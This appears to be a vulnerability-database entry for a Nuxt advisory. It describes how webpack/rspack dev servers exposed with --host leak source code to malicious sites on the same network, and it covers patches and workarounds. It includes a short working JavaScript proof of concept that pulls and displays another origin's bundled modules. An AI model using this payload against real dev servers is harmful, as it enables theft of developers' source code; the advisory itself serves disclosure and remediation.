Severity by source
CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from Vendor (https://github.com/nuxt/nuxt) · only source for this CVE.
CVSS VectorVendor: https://github.com/nuxt/nuxt
CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
Summary
This is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network.
Details
The fix for GHSA-4gf7-ff8x-hq99 relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because these headers are sent by the browsers only for potentially trustworthy origins, the check is able to bypass for non-potentially trustworthy origins.
Since the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using --host is affected.
PoC
- Create a nuxt project with webpack / rspack builder.
- Run
npm run dev - Open
http://localhost:3000 - Run the script below in a web site that has a different origin.
- You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to
script.addEventListener('load', () => {
const key = Object.keys(window).find(k => k.startsWith("webpackChunk"))
for (const page in window[key]) {
const moduleList = window[key][page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)(This script is the similar with GHSA-4gf7-ff8x-hq99 except for the script.src and the global variable name)
Impact
Users using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using --host.
This vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to the local network access restriction feature.
Patches
Fixed in nuxt@4.4.6 and nuxt@3.21.6 by #35051. The dev-middleware same-origin check now falls back to comparing the request's Origin / Referer host against Host when Sec-Fetch-* headers are absent, closing the non-trustworthy-origin bypass.
The fix only ships for the @nuxt/webpack-builder and @nuxt/rspack-builder packages. The default Vite builder was not affected.
Workarounds
If you cannot upgrade immediately:
- Don't use
nuxt dev --host. Bind the dev server tolocalhost(the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks. - Use Chrome 142+ or another Chromium-based browser that enforces local network access restrictions.
- Switch to the Vite builder for development.
AnalysisAI
Source code disclosure in Nuxt's webpack and rspack dev server middleware enables a malicious website on the same local network to exfiltrate full application source code when developers run nuxt dev --host. The previous fix for GHSA-4gf7-ff8x-hq99 relied exclusively on Sec-Fetch-Mode and Sec-Fetch-Site headers, which browsers only send from potentially trustworthy origins (HTTPS or localhost) per the W3C Fetch Metadata specification - requests originating from plain HTTP pages on LAN omit these headers entirely, bypassing the same-origin check. A working proof-of-concept is embedded in the vendor advisory; no public exploit identified at time of analysis in CISA KEV.
Technical ContextAI
The vulnerability resides in the dev middleware for @nuxt/webpack-builder and @nuxt/rspack-builder npm packages, classified under CWE-749 (Exposed Dangerous Method or Function). The incomplete prior fix enforced same-origin access control by checking Sec-Fetch-Mode: no-cors and Sec-Fetch-Site: cross-site request headers. However, per the W3C Fetch Metadata specification (https://w3c.github.io/webappsec-fetch-metadata/), browsers only append these headers when the request originates from a 'potentially trustworthy URL' - meaning HTTPS or localhost. When the Nuxt dev server is bound to a LAN IP via --host, cross-origin requests from plain HTTP pages on the same network bypass this check because the browser never sends the Sec-Fetch-* headers. The patch in PR #35051 introduces an isSameOriginRequest() function that falls back to comparing the Origin or Referer header host against the Host header when Sec-Fetch-Site is absent, closing the bypass. The default Vite builder was not affected; only the webpack and rspack builders contain the vulnerable middleware code path.
RemediationAI
The primary fix is to upgrade to nuxt@3.21.6 or nuxt@4.4.6, which deliver patched versions of both @nuxt/webpack-builder and @nuxt/rspack-builder with the corrected same-origin middleware (see PR #35051 at https://github.com/nuxt/nuxt/pull/35051). If immediate upgrade is not feasible, three specific workarounds are available: (1) Stop using nuxt dev --host and bind exclusively to localhost (the default), using SSH tunneling or a reverse proxy for remote device access - this eliminates the attack surface entirely with no functional trade-off for most workflows; (2) Switch to the Vite builder for development, which is not affected and is already the default in current Nuxt versions; (3) Enforce use of Chrome 142+ or another Chromium-based browser with local network access restrictions enabled, which blocks cross-origin requests to LAN IPs at the browser level - note this is a client-side control only and does not protect developers using Firefox or older Chromium versions. Advisory: https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-749 – Exposed Dangerous Method or Function
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-36419
GHSA-6m52-m754-pw2g